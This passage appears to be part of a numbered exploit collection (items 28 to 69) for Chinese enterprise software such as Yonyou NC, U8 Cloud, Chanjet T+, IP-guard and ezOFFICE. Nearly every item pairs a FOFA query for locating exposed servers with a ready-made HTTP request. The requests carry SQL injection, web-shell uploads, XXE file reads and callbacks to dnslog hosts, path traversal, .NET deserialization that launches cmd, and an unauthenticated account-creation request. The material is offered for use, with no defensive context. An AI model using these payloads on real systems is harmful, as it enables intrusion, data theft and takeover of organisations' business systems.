User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud Government Financial Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3336 `


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie via the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
